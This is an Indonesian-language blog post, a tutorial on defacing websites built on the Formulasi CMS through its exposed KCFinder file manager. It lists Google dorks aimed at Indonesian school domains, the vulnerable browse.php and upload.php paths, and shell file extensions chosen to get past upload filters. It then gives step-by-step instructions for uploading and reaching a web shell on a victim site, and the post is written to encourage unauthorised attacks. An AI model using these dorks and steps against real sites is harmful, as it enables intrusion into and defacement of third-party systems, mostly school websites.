Cara Deface Dengan CMS Formulasi Kcfinder
Hallo gan :v kali ini gua mau share tutorial cara deface dengan cms formulasi kcfinder
================================
Materials :
-dork (nanti gua siapin dibawah :v )
-exploit (ada dibawah gan :v )
-shell ber ext .php5 .php.xxxjpg .php.fla
-siapkan kesabaran lu :v
================================
Dork :
-inurl:data-link- site:sch.id
-inurl:/?p=detberita&id=
-powered by Formulasi Free Opensource CMS
*KEMBANGIN LAGI PAKE OTAK WIBU LU :v
================================
Exploit :
1.adminpanel/ckeditor/kcfinder/browse.php (bisa langsung upload shell)
2.adminpanel/ckeditor/kcfinder/upload.php (upload shell nya pakek csrf,post file:filedata)
================================
Langsung Aja ke Tutornya :v
1.dorking target di google
2.pilih salah satu web yang vuln
3.masukkan exploit
contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php
4.upload shell kalian dengan ext yang diatas tadi
5.kalo sukses terupload, tinggal akses shell nya di http://site.sch.id/[path]images/files/namashell.php5
6.kalo udah kebuka aksesnya, terserah kalian mau diapain wkwkwk
oke sekian tutor dari gua, selamat beraktivitas ^_^
================================
EmoticonEmoticon